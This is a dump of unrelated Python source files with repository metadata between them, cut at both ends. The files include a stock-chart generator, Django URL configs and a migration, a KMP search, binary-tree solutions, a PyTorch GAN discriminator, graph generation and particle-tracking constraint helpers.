return "hello {}".format(s)
print(hello("Darek"))
|
[
"noreply@github.com"
] |
noreply@github.com
|
16e59e20f7df9e8f624ab2a4d96bc91cbdf7ad6f
|
b5b3c006a6dcd607df2546d30e7789225b3699c7
|
/optionstrading/nysedump100.py
|
de79ccafaaa0526537bad3580ba41b2c2a946ab5
|
[] |
no_license
|
webclinic017/mypython
|
df3467f6d977f75640f68d7ccdf33c5772632b31
|
2bddc5ad8201a5a9fd962409b83a6dd20de67aea
|
refs/heads/master
| 2023-02-05T03:56:05.240956
| 2020-12-31T06:09:45
| 2020-12-31T06:09:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,369
|
py
|
import numpy as np
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import basictools as bt
import pandas_datareader as pdr
import yfinance as yf
import os
import time
sns.set(style="whitegrid")
stocklist=[]
with open('nsdqlist') as f:
for i in f.readlines():
stocklist.append(i.replace("\n", ""))
print(stocklist)
if __name__ == "__main__":
with open('/var/www/html/nsdq.html', 'w') as file:
file.write('<html> \n')
file.write(' <head> \n')
file.write(' <title> NYSE Stock Data</title> \n')
file.write(' </head> \n')
file.write(' <body> \n')
for i in stocklist:
file.write(' <H1> ' + i + ' </H1> \n')
file.write(" <img alt='no image1' src='" + i + ".png'></img> \n")
file.write(' </body> \n')
        file.write('</html> \n')
while(1):
data1 = bt.get_stock_data(bt.get_data(365), bt.get_data(0), *stocklist)
for i in stocklist:
try:
data1[i].plot(subplots=False, figsize=(10, 4))
str1="/var/www/html/"+i+".png"
plt.savefig(str1)
plt.clf()
plt.cla()
plt.close()
        except Exception:
plt.clf()
plt.cla()
plt.close()
time.sleep(86400)
|
[
"owenyang15@gmail.com"
] |
owenyang15@gmail.com
|
fd9e511e51c72e0a1353b2c0bc7ae8c41207336b
|
5593282e0e1b2e3c1f19e06a6d9d8ee66bb06544
|
/learning_site/courses/urls.py
|
68a571a60615678420982dcf8c5543661e9037de
|
[] |
no_license
|
aliglaser/django_basics
|
e9921c7adbe7107feb8d6776b78eeed565758768
|
72afc874724517eab7aa08902600da377d0acd6e
|
refs/heads/master
| 2020-03-20T20:05:24.338912
| 2018-06-17T16:32:34
| 2018-06-17T16:32:34
| 137,669,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 342
|
py
|
from django.contrib import admin
from django.urls import path
from django.conf.urls import url
from . import views
app_name = "courses"
urlpatterns = [
path('', views.course_list, name="course_list"),
path('<course_pk>/<step_pk>/', views.step_detail, name="step_detail"),
path('<int:pk>/', views.course_detail, name="course_detail"),
]
|
[
"nurinuriprettynuri@gmail.com"
] |
nurinuriprettynuri@gmail.com
|
3b181b6db3bb75bc674258d94064ebebd1809799
|
4c435f68c026b578f4564cc321353bb3d7ec1685
|
/day7-字符串和常用的数据结构/exam/double_ball.py
|
ca48de308d2dd3833f45d47efd1cfd434fde0bad
|
[] |
no_license
|
Keekuun/my-pthon-100
|
a8a0e4fdd1f5264aadcf7302779ecbb968378481
|
ca3a703966f2c2d06761d960839d9ffecc9108f3
|
refs/heads/master
| 2020-05-18T23:59:37.153200
| 2019-06-02T08:48:58
| 2019-06-02T08:48:58
| 184,725,421
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 810
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
created on 2019/5/5
@user: Keekuun
功能描述:
双色球选号
"""
from random import randrange, randint, sample
def display(balls):
"""
    Print the double-color-ball numbers in the list
"""
for index, ball in enumerate(balls):
if index == len(balls) - 1:
print('|', end=' ')
print('%02d' % ball, end=' ')
print()
def random_select():
"""
    Randomly select one set of numbers
"""
red_balls = [x for x in range(1, 34)]
    # sample 6 distinct red balls without replacement
selected_balls = sample(red_balls, 6)
selected_balls.sort()
selected_balls.append(randint(1, 16))
return selected_balls
def main():
    n = int(input('How many random picks: '))
for _ in range(n):
display(random_select())
if __name__ == '__main__':
main()
|
[
"1315815604@qq.com"
] |
1315815604@qq.com
|
d1e8f367dd86118abe6879d5f86109637b40400a
|
3b36a274dc6b6aa4417fc6d859436d5f50f208b7
|
/KMP.py
|
3b82377f2029ab61c092e42a95ed8f8d7ceaddb9
|
[] |
no_license
|
saife245/ALGORITHM-AND-DATA-STRUCTURE
|
66baca2ba63d3b2cffcdafc19cd82913d18f47be
|
cd7145beaf0973463805abff5c498b98e2e88c80
|
refs/heads/master
| 2020-03-28T06:16:26.058603
| 2018-11-17T18:26:15
| 2018-11-17T18:26:15
| 147,824,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 891
|
py
|
def KMP(pattern, string):
m = len(pattern)
n = len(string)
    s = [0] * m  # failure table (longest proper prefix-suffix) for the pattern
j = 0
calc_next(pattern, m, s)
i = 0
while i < n:
if pattern[j] == string[i]:
i += 1
j += 1
if j == m:
print ("Found at " + str(i-j))
j = s[j-1]
elif i < n and pattern[j] != string[i]:
if j != 0:
j = s[j-1]
else:
i += 1
def calc_next(pattern, n, s):
l = 0
    s[0] = 0  # base case: a length-1 prefix has no proper prefix-suffix
i = 1
while i < n:
if pattern[i]== pattern[l]:
l += 1
s[i] = l
i += 1
else:
if l != 0:
l = s[l-1]
else:
s[i] = 0
i += 1
string = "banananobano"
pattern = "nano"
KMP(pattern, string)
|
[
"noreply@github.com"
] |
noreply@github.com
|
ac9cbff6616993fe2ea2f872485ef2cd05863776
|
419873dd3b7412f704b1a7907b64a60b44cedf39
|
/python/树/1448. 统计二叉树中好节点的数目.py
|
00d74027dba7eea0cc91e63759b58e33a3e74545
|
[] |
no_license
|
Weless/leetcode
|
0585c5bfa260713f44dabc51fa58ebf8a10e7814
|
0566622daa5849f7deb0cfdc6de2282fb3127f4c
|
refs/heads/master
| 2021-11-13T07:59:20.299920
| 2021-10-25T02:09:53
| 2021-10-25T02:09:53
| 203,720,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,627
|
py
|
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def goodNodes(self, root: TreeNode) -> int:
if not root:
return 0
from collections import deque
queue = deque()
queue.appendleft((root.val,root))
count = 1
while queue:
nodeVal,node = queue.pop()
if node.left:
if node.left.val >= nodeVal:
queue.appendleft((node.left.val,node.left))
count+=1
else:
queue.appendleft((nodeVal,node.left))
if node.right:
if node.right.val >= nodeVal:
queue.appendleft((node.right.val,node.right))
count+=1
else:
queue.appendleft((nodeVal,node.right))
return count
class Solution:
def goodNodes(self, root: TreeNode) -> int:
if not root:
return 0
        self.res = 1  # the root itself is always a good node
def dfs(root,val):
if not root:
return
if root.left:
if root.left.val >= val:
self.res +=1
dfs(root.left,root.left.val)
else:
dfs(root.left,val)
if root.right:
if root.right.val >= val:
self.res +=1
dfs(root.right,root.right.val)
else:
dfs(root.right,val)
dfs(root,root.val)
return self.res
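# Quick illustrative check (not in the original file): the tree
# [3,1,4,3,None,1,5] from LeetCode 1448 contains 4 good nodes.
root = TreeNode(3, TreeNode(1, TreeNode(3)), TreeNode(4, TreeNode(1), TreeNode(5)))
print(Solution().goodNodes(root))  # 4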
|
[
"twzcxx1@163.com"
] |
twzcxx1@163.com
|
1e0b285cb8ac7fcbc73604eb8496ee2d461f6df6
|
9397cd77704723787d6646152d9829ad2ed7057c
|
/scripts/codeserver/stop.py
|
949aaabc931391e562773c3fbfeeeb42f6837713
|
[
"Apache-2.0"
] |
permissive
|
cloudify-examples/cloudify-rolling-upgrade
|
028f5f4021c26ed3790c0be9ce3351ebb5e1bb24
|
b2edc632f3ee5b4cf2fd2ee018ac814cfaed6c6b
|
refs/heads/master
| 2021-01-17T10:22:59.410566
| 2016-10-20T10:34:34
| 2016-10-20T10:34:34
| 57,342,216
| 2
| 2
| null | 2016-10-20T10:34:34
| 2016-04-29T00:17:34
|
Python
|
UTF-8
|
Python
| false
| false
| 531
|
py
|
#
# Stop the process that serves code to the rolling upgrade process. In a
# "real" system, this would be external to this blueprint.
#
import os
from cloudify import ctx
def stop():
ctx.logger.info("stopping codeserver")
    # fetch the server's pid from runtime properties, kill it, and clean up
pid=ctx.instance.runtime_properties['pid']
os.system("kill {}".format(pid))
os.system("rm -rf /tmp/code")
ctx.logger.info("stop complete")
stop()
|
[
"dewayne@gigaspaces.com"
] |
dewayne@gigaspaces.com
|
17371c0c05eb0a54d12cfae1089ffbf4af13250e
|
0a2167a58687db61423fa71dc3982194c8dbf3a4
|
/photo_upload_js/search/urls.py
|
57e7e59472bb8529fa18d1bbca7daf94b1e18388
|
[] |
no_license
|
nilldiggonto/js_with_django3
|
e6728192bc45313b43fc8c1696207ee0eb990445
|
ec8df007732ada06aba8956460a2ecb0d5f20b27
|
refs/heads/main
| 2023-03-13T18:17:13.465079
| 2021-03-01T12:43:40
| 2021-03-01T12:43:40
| 338,062,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
from django.urls import path
from .views import SearchListView,post_with_photo_view
urlpatterns = [
path('',SearchListView.as_view(),name='search-list'),
path('up/',post_with_photo_view,name='up-post'),
]
|
[
"nilldiggonto@gmail.com"
] |
nilldiggonto@gmail.com
|
726b58567c2d9b96312f1a2247fda43614f50976
|
1eedb7439266cc63df179aac8fae28cdcf83b3d5
|
/nuwe_data_viewer/plugin/project_explorer/model/container_node.py
|
311b62d82ec1eb6b6954727a6b4e65bfa9ca2073
|
[] |
no_license
|
perillaroc/nuwe-data-viewer
|
6f11d19de920bbe2c9937ee4c3169cbe20dfafcc
|
12a49844980946f07523f87786b054aa6d9c2e10
|
refs/heads/master
| 2020-03-27T04:59:41.085059
| 2019-05-11T14:24:44
| 2019-05-11T14:24:44
| 145,986,751
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
# coding: utf-8
from nuwe_data_viewer.plugin.project_explorer.model.node import Node
class ContainerNode(Node):
def __init__(self, display_name="", node_id=None):
Node.__init__(self, display_name, node_id)
|
[
"perillaroc@gmail.com"
] |
perillaroc@gmail.com
|
f09d106fdba174b4d50bd24e47c76d79bcff3de6
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/galex_j16155+5048/sdB_galex_j16155+5048_coadd.py
|
910403f482b6eda6d8e12bdf3a0cae2ad2051389
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 453
|
py
|
from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[243.88925,50.807131], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_galex_j16155+5048/sdB_galex_j16155+5048_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_galex_j16155+5048/sdB_galex_j16155+5048_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
c30195e20830c6a9fff035c49fb0fb984e4a74c3
|
1be9a0eb0d5a359f6602e940e251cb5f926c5d3b
|
/accounts/urls.py
|
ff35917108298c8f30d271239109626d80048147
|
[] |
no_license
|
Ashish138200/SocialMC
|
5d6420eb3d6102b3c5916407b8316fdcc8a2d4c8
|
a945ab99d0a34d68994ad6946e40b0712a2ca510
|
refs/heads/master
| 2023-07-15T07:18:28.352298
| 2021-08-26T10:36:37
| 2021-08-26T10:36:37
| 288,792,754
| 0
| 1
| null | 2020-12-15T18:48:40
| 2020-08-19T17:18:07
|
Python
|
UTF-8
|
Python
| false
| false
| 501
|
py
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
app_name = 'accounts'
urlpatterns = [
    # path() takes literal routes, not regexes, so the url()-style '$' suffixes
    # would never match and have been dropped.
    path('login', auth_views.LoginView.as_view(template_name='accounts/login.html'), name='login'),
    # Display the login form and handle the login action.
    path('logout/', auth_views.LogoutView.as_view(), name='logout'),
    # Log out the user and display the 'You are logged out' message.
    path('signup/', views.SignUp.as_view(), name='signup'),
]
|
[
"ashish.chaurasia_ccv18@gla.ac.in"
] |
ashish.chaurasia_ccv18@gla.ac.in
|
f23afbc4e4161baef516abce0a35323d97d2e03e
|
afd9fcd9b15602167d8b09a7fcc32b2e6454c25b
|
/models/discriminator.py
|
e0d4fecf6eba078ebbcc89be9c94940e84070413
|
[] |
no_license
|
Andrewsher/cincgan
|
3bcecc0d140bc540b031651737f4cc8c7e996a68
|
a99c78881bef25459cf8d31ebd3605e11c9ed17a
|
refs/heads/master
| 2022-04-19T19:50:33.627938
| 2020-04-05T07:45:17
| 2020-04-05T07:45:17
| 221,356,193
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,813
|
py
|
import torch
from torch import nn
import torch.nn.functional as F
class Discriminator_lr(nn.Module):
def __init__(self, in_channels=1, in_h=16, in_w=16):
super(Discriminator_lr, self).__init__()
self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=64, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1)
self.bn1 = nn.BatchNorm2d(num_features=128)
self.conv3 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm2d(num_features=256)
self.conv4 = nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1)
self.bn3 = nn.BatchNorm2d(num_features=512)
self.conv5 = nn.Conv2d(in_channels=512, out_channels=1, kernel_size=3, padding=1)
self.linear1 = nn.Linear(in_features=1*in_h*in_w, out_features=1024)
self.linear2 = nn.Linear(in_features=1024, out_features=1)
def forward(self, x):
y = F.leaky_relu(self.conv1(x), inplace=True)
y = F.leaky_relu(self.bn1(self.conv2(y)), inplace=True)
y = F.leaky_relu(self.bn2(self.conv3(y)), inplace=True)
y = F.leaky_relu(self.bn3(self.conv4(y)), inplace=True)
y = F.leaky_relu(self.conv5(y), inplace=True)
# y = y.flatten(1, -1)
# y = nn.Linear(in_features=y.shape[-1], out_features=1024)
# y.shape[-1]
# y = F.relu(self.linear1(y.view(y.size(0), -1)), inplace=True)
y = F.leaky_relu(self.linear1(y.flatten(1, -1)), inplace=True)
        y = torch.sigmoid(self.linear2(y))  # F.sigmoid is deprecated
return y
class Discriminator_sr(nn.Module):
def __init__(self, in_channels=1, in_h=64, in_w=64):
super(Discriminator_sr, self).__init__()
self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=64, kernel_size=3, padding=1, stride=2)
self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1, stride=2)
self.bn1 = nn.BatchNorm2d(num_features=128)
self.conv3 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm2d(num_features=256)
self.conv4 = nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, padding=1)
self.bn3 = nn.BatchNorm2d(num_features=512)
self.conv5 = nn.Conv2d(in_channels=512, out_channels=1, kernel_size=3, padding=1)
self.linear1 = nn.Linear(in_features=1*in_h*in_w//16, out_features=128)
self.linear2 = nn.Linear(in_features=128, out_features=1)
def forward(self, x):
y = F.leaky_relu(self.conv1(x), inplace=True)
y = F.leaky_relu(self.bn1(self.conv2(y)), inplace=True)
y = F.leaky_relu(self.bn2(self.conv3(y)), inplace=True)
y = F.leaky_relu(self.bn3(self.conv4(y)), inplace=True)
y = F.leaky_relu(self.conv5(y), inplace=True)
y = y.flatten(1, -1)
y = F.leaky_relu(self.linear1(y), inplace=True)
# y = nn.Linear(in_features=y.shape[-1], out_features=1024)
# y.shape[-1]
# y = F.relu(self.linear1(y.view(y.size(0), -1)), inplace=True)
        y = torch.sigmoid(self.linear2(y))  # F.sigmoid is deprecated
return y
if __name__ == '__main__':
model = Discriminator_sr()
print(model)
# for parameter in model.parameters():
# print(parameter)
print("# of parameter:", sum(param.numel() for param in model.parameters()))
import numpy as np
input_map = np.zeros((1, 64, 64))
# input_map = np.reshape(input_map, (1, 64, 64))
import torchvision, torch
# input_map = torchvision.transforms.functional.to_tensor(input_map)
input_maps = torch.as_tensor(data=[input_map, input_map, input_map, input_map], dtype=torch.float)
print(input_maps.shape)
output_map = model(input_maps)
print(output_map.shape)
|
[
"30388833+Andrewsher@users.noreply.github.com"
] |
30388833+Andrewsher@users.noreply.github.com
|
23776c548405a31bbc4586662ae2da0f5154d617
|
dd50e92d9d05f00d96aefd61e1422f1897397af1
|
/venv/Scripts/futurize-script.py
|
482848934b8f88ae0adfafc67a6dc8fcb065b8d9
|
[] |
no_license
|
zrxingchen/bwshop
|
ca60f55a948b64a07df4b31d6dc8b26bae0ceb4b
|
53d5bee96adf8b7fea8f560907555f2b4068b6ce
|
refs/heads/master
| 2022-07-29T21:19:49.183645
| 2020-05-23T07:54:15
| 2020-05-23T07:54:15
| 266,286,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
#!D:\BWshop\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
__requires__ = 'future==0.18.2'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('future==0.18.2', 'console_scripts', 'futurize')()
)
|
[
"2425277916@qq.com"
] |
2425277916@qq.com
|
520f84d54ac2da80bd3c31865bc75383a40b08e6
|
77f9dc39ea7bbf904201ccfda9a806ce8c68605d
|
/hamiltonian_cycle/erdos_renyi_model_generation.py
|
fce71db43449b9c453ae3476eddd7a16fdb42fa8
|
[] |
no_license
|
TzuriR/Complex-Networks
|
c5787ab5be27d9c4356dd12e36deb5f0f11a8ac0
|
76cd862193e699799d87177a19b7cd792eaf7a52
|
refs/heads/main
| 2023-06-05T10:43:02.045696
| 2021-06-23T18:36:26
| 2021-06-23T18:36:26
| 308,382,110
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,428
|
py
|
import networkx as nx
import matplotlib.pyplot as plt
# Generate graph
def gen_graph(n, p):
g = nx.generators.random_graphs.erdos_renyi_graph(n, p)
print("g.nodes:", g.nodes)
print("g.edges:", g.edges)
nx.draw(g, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
'''
g.nodes:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
g.edges:
[(0, 1), (0, 2), (0, 5), (0, 7), (0, 8), (1, 3), (1, 5), (1, 6), (1, 8), (1, 9), (2, 3), (2, 4), (2, 5), (2, 6),
(2, 8), (3, 5), (3, 7), (3, 8), (3, 9), (4, 5), (4, 7), (5, 6), (5, 7), (5, 8), (6, 7), (6, 9), (7, 8)]
# Example: do cycle with rotation - 10
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
g.add_edge(0, 1)
g.add_edge(0, 2)
g.add_edge(0, 8)
g.add_edge(1, 4)
g.add_edge(1, 5)
g.add_edge(2, 4)
g.add_edge(2, 8)
g.add_edge(3, 4)
g.add_edge(3, 6)
g.add_edge(3, 7)
g.add_edge(3, 8)
g.add_edge(3, 9)
g.add_edge(4, 5)
g.add_edge(4, 7)
g.add_edge(4, 9)
g.add_edge(5, 8)
g.add_edge(5, 9)
g.add_edge(6, 7)
g.add_edge(6, 8)
g.add_edge(7, 8)
g.add_edge(7, 9)
nx.draw(g, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
#Example: do cycle without rotation - 6
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5])
g.add_edge(0, 1)
g.add_edge(0, 3)
g.add_edge(0, 5)
g.add_edge(1, 2)
g.add_edge(1, 3)
g.add_edge(1, 4)
g.add_edge(2, 4)
g.add_edge(4, 5)
nx.draw(g, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
#Example: do cycle without rotation - 10
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
g.add_edge(0, 4)
g.add_edge(0, 6)
g.add_edge(0, 7)
g.add_edge(0, 9)
g.add_edge(1, 2)
g.add_edge(1, 3)
g.add_edge(1, 5)
g.add_edge(1, 6)
g.add_edge(1, 7)
g.add_edge(2, 3)
g.add_edge(2, 5)
g.add_edge(2, 6)
g.add_edge(2, 7)
g.add_edge(3, 4)
g.add_edge(3, 5)
g.add_edge(3, 7)
g.add_edge(4, 6)
g.add_edge(4, 7)
g.add_edge(4, 8)
g.add_edge(5, 6)
g.add_edge(5, 7)
g.add_edge(6, 8)
g.add_edge(6, 9)
g.add_edge(8, 9)
nx.draw(g, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
return g
'''
return g
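# Illustrative usage (not in the original file): a 10-node graph with
# edge probability 0.5, matching the commented examples above.
if __name__ == '__main__':
    gen_graph(10, 0.5)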
|
[
"noreply@github.com"
] |
noreply@github.com
|
fb3a5e9f5dce86eb789b96780d23bfa15143549e
|
f48b15249ffe83bb7aaa5c808fc133ee1e3779d1
|
/clustertracking/constraints.py
|
09859930c059bdc0ca95ba1ffb629dc83db8674a
|
[] |
no_license
|
caspervdw/clustertracking
|
15aff332c6524bad265637e547d8f40e563d8991
|
2a45f71ed84bd2c31b001a7ce2f25e58798659c6
|
refs/heads/master
| 2020-05-22T04:14:47.724621
| 2017-03-14T14:20:40
| 2017-03-14T14:20:40
| 64,404,511
| 0
| 0
| null | 2016-09-27T11:09:48
| 2016-07-28T14:57:36
|
Python
|
UTF-8
|
Python
| false
| false
| 6,727
|
py
|
from __future__ import division, print_function, absolute_import
import six
import numpy as np
from .utils import validate_tuple
from .fitfunc import vect_to_params
from warnings import warn
def _wrap_fun(func, params_const, modes, ids=None):
def wrapped(vect, *args, **kwargs):
params = vect_to_params(vect, params_const, modes, ids)
return func(params, *args, **kwargs)
return wrapped
def wrap_constraints(constraints, params_const, modes, groups=None):
if constraints is None:
return []
if groups is not None:
        cl_sizes = np.array([len(params_const)], dtype=int)  # np.int was removed from NumPy
result = []
for cons in constraints:
cluster_size = cons.get('cluster_size', None)
if cluster_size is None:
            # provide all parameters to the constraint; bind the constraint's
            # function through a default argument, since a plain closure would
            # late-bind to the last iteration of the loop
            def wrapped(vect, *args, _fun=cons['fun'], **kwargs):
                params = vect_to_params(vect, params_const, modes, groups)
                return _fun(params[np.newaxis, :, :], *args, **kwargs)
elif groups is None:
if len(params_const) != cluster_size:
continue
            # provide all parameters to the constraint (same binding as above)
            def wrapped(vect, *args, _fun=cons['fun'], **kwargs):
                params = vect_to_params(vect, params_const, modes, groups)
                return _fun(params[np.newaxis, :, :], *args, **kwargs)
elif cluster_size in cl_sizes:
groups_this = groups[0][cl_sizes == cluster_size]
if len(groups_this) == 0:
continue
            # group the appropriate clusters together and return multiple values
            def wrapped(vect, *args, _fun=cons['fun'], _groups=groups_this, **kwargs):
                params = vect_to_params(vect, params_const, modes, groups)
                params_grouped = np.array([params[g] for g in _groups])
                return _fun(params_grouped, *args, **kwargs)
else:
continue
cons_wrapped = cons.copy()
cons_wrapped['fun'] = wrapped
result.append(cons_wrapped)
if 'jac' in cons_wrapped:
warn('Constraint jacobians are not implemented')
del cons_wrapped['jac']
return result
def _dimer_fun(x, dist, ndim):
pos = x[..., 2:2+ndim] # get positions only
return 1 - np.sum(((pos[:, 0] - pos[:, 1])/dist)**2, axis=1)
# def _dimer_jac(x, dist, ndim):
# result = np.zeros_like(x)
# x = x[:, 2:2+ndim] # get positions only
# result[:, 2:2+ndim] = -2 * (x - x[[1, 0]])/dist[np.newaxis, :]**2
# return result
def dimer(dist, ndim=2):
"""Constrain clusters of 2 at given distance.
    Allows image anisotropy by providing a tuple as the distance."""
dist = np.array(validate_tuple(dist, ndim))
return (dict(type='eq', cluster_size=2, fun=_dimer_fun, args=(dist, ndim)),)
def _trimer_fun(x, dist, ndim):
x = x[..., 2:2+ndim] # get positions only
return np.concatenate((1 - np.sum(((x[:, 0] - x[:, 1])/dist)**2, axis=1),
1 - np.sum(((x[:, 1] - x[:, 2])/dist)**2, axis=1),
1 - np.sum(((x[:, 0] - x[:, 2])/dist)**2, axis=1)))
# def _trimer_jac(x, dist, ndim, indices):
# result = np.zeros_like(x)
# x = x[:, -ndim:] # get positions only
# result[indices, -ndim:] = -2 * (x[indices] - x[indices[::-1]])/dist[np.newaxis, :]**2
# return result
def trimer(dist, ndim=2):
"""Constrain clusters of 3 at given distance.
    Allows image anisotropy by providing a tuple as the distance.
    Constrains all 3 pairwise distances to the same value."""
dist = np.array(validate_tuple(dist, ndim))
return (dict(type='eq', cluster_size=3, fun=_trimer_fun, args=(dist, ndim)),)
def _tetramer_fun_2d(x, dist):
x = x[..., 2:4] # get positions only
dists = np.vstack((np.sum(((x[:, 0] - x[:, 1])/dist)**2, axis=1),
np.sum(((x[:, 1] - x[:, 2])/dist)**2, axis=1),
np.sum(((x[:, 0] - x[:, 2])/dist)**2, axis=1),
np.sum(((x[:, 1] - x[:, 3])/dist)**2, axis=1),
np.sum(((x[:, 0] - x[:, 3])/dist)**2, axis=1),
np.sum(((x[:, 2] - x[:, 3])/dist)**2, axis=1)))
# take the 4 smallest: they should be 1
# do not test the other 2: they are fixed by the 4 first constraints.
dists = np.sort(dists, axis=0)[:4]
return np.ravel(1 - dists)
def _tetramer_fun_3d(x, dist):
x = x[..., 2:5] # get positions only
return np.concatenate((1 - np.sum(((x[:, 0] - x[:, 1])/dist)**2, axis=1),
1 - np.sum(((x[:, 1] - x[:, 2])/dist)**2, axis=1),
1 - np.sum(((x[:, 0] - x[:, 2])/dist)**2, axis=1),
1 - np.sum(((x[:, 1] - x[:, 3])/dist)**2, axis=1),
1 - np.sum(((x[:, 0] - x[:, 3])/dist)**2, axis=1),
1 - np.sum(((x[:, 2] - x[:, 3])/dist)**2, axis=1)))
def tetramer(dist, ndim=2):
"""Constrain clusters of 4 at given distance.
For 2D: features are in a perfect square (4 constraints)
For 3D: features are constrained in a tetrahedron (6 constraints).
    Allows image anisotropy by providing a tuple as the distance."""
dist = np.array(validate_tuple(dist, ndim))
if ndim == 2:
return (dict(type='eq', cluster_size=4, fun=_tetramer_fun_2d, args=(dist,)),)
elif ndim == 3:
return (dict(type='eq', cluster_size=4, fun=_tetramer_fun_3d, args=(dist,)),)
else:
raise NotImplementedError
def _dimer_fun_global(x, mpp, ndim):
if x.ndim == 2 or len(x) <= 1:
return []
pos = x[..., 2:2+ndim] # get positions only, shape (n_clusters, 2, ndim)
dist_squared = np.sum(((pos[:, 0] - pos[:, 1])*mpp)**2, axis=1)**2
return np.diff(dist_squared)
# def _dimer_jac_global(x, mpp, ndim):
# if x.ndim == 2 or len(x) <= 1:
# return []
# result = np.zeros((x.shape[0] - 1,) + x.shape)
# x = x[..., -ndim:] # get positions only, shape (n_clusters, 2, ndim)
# _jac = -2 * (x - x[:, [1, 0]]) * mpp**2
# # result[:, :-1, :, -ndim] = _jac
# # result[:, 1:, :, -ndim] = -1*_jac
#
# for i in range(x.shape[0] - 1):
# result[i, i, :, -ndim:] = _jac[i]
# result[i, i + 1, :, -ndim:] = -_jac[i + 1]
# return result
def dimer_global(mpp, ndim=2):
"""Constrain clusters of 2 to a constant, unknown distance.
Allows image anisotropy by providing ``mpp``, microns per pixel. The
number of constraints equals the number of frames - 1."""
# the jacobian seems to slow things down.
# in tests: 26 iterations without, 198 with
mpp = np.array(validate_tuple(mpp, ndim))
return (dict(type='eq', fun=_dimer_fun_global, args=(mpp, ndim,)),)
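# Illustrative check (not in the original file): two features 2 px apart
# satisfy a dimer constraint at distance 2 (fun evaluates to ~0). The
# per-feature parameter layout (signal, size, y, x) is assumed from the
# position slice x[..., 2:2+ndim] used above, and validate_tuple is assumed
# to broadcast a scalar distance to a tuple.
if __name__ == '__main__':
    params = np.array([[[1.0, 1.0, 0.0, 0.0],
                        [1.0, 1.0, 0.0, 2.0]]])  # one cluster of two features
    (cons,) = dimer(2.0, ndim=2)
    print(cons['fun'](params, *cons['args']))  # ~[0.]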
|
[
"caspervdw@gmail.com"
] |
caspervdw@gmail.com
|
111628150e762a86920296bd8ea444544424cdbd
|
f1c51fb8638dcf8876b376c7574f777956812f8a
|
/product/migrations/0002_auto_20170910_2136.py
|
a79959aa08bdc6963bb9188ccc79c34ef6ead83c
|
[] |
no_license
|
toshunster/mudhaa
|
1ca4cadd84b506588ef35bcf7dea643243cbf681
|
f2607ed314d8a57978dcb18365ae76858d62b745
|
refs/heads/master
| 2022-12-11T18:33:37.042636
| 2017-10-21T20:21:00
| 2017-10-21T20:21:00
| 103,202,463
| 0
| 0
| null | 2022-12-08T00:36:09
| 2017-09-12T00:32:59
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,286
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-09-10 21:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import vendor.items.fields
class Migration(migrations.Migration):
dependencies = [
('product', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Packing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=23, verbose_name='Packing text')),
],
),
migrations.CreateModel(
name='TypeOrUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type_or_user', models.CharField(max_length=60)),
],
),
migrations.AddField(
model_name='product',
name='SKU',
